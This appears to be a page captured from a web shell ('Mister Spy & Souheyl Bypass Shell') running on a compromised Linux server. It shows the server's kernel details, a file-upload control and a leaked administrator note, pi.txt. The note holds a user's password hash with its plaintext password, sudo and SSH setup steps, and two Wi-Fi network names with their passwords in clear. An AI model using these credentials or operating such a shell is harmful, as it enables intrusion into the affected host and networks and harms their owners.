Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /proc/thread-self/root/usr/local/lib/python3.8/dist-packages/iftlib/intern/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/usr/local/lib/python3.8/dist-packages/iftlib/intern/pi.txt

#  add to /etc/passwd
pi:x:2001:900:Pi,,,:/home/pi:/bin/bash

#add to /etc/shadow, password is rasp
pi:$6$6Pc39oZdbE6UZmAm$9dHHkBW1VPxK1HarEd3HXXAC.eMOMG71LYzAYo9xd/BIfmA5d70IIg/X/zTwjOUTv7sjiF2vEy57sqkD8uD5H1:20414::::::

#add to /etc/group, and add user pi to group sudoers:
pi:x:900:



#in the file /etc/ssh/sshd_config:
KbdInteravticeAuthentication   no    -->  set to yes



#deactivate the file /usr/....wpa_supplicant.servive



#store as rc.local, and change the permissions to 775
#!/bin/sh
/usr/sbin/wpa_supplicant -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf -B
sleep 1
/usr/sbin/dhcpcd wlan0
sleep 1
/usr/sbin/service ssh start
#/usr/sbin/ufw allow 22


#  change the computer name in /etc/hostname

#  provide a directory /home/pi


#store as wpa_supplicant.conf into /etc/wpa_supplicant
country=de
update_config=1
ctrl_interface=/var/run/wpa_supplicant

network={
 scan_ssid=1
 key_mgmt=WPA-PSK
 ssid="holz&machines"
 psk="rxv756aqw"
}

network={
 scan_ssid=1
 key_mgmt=WPA-PSK
 ssid="IFTLAN123"
 psk="8ab348ab34"
}


bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net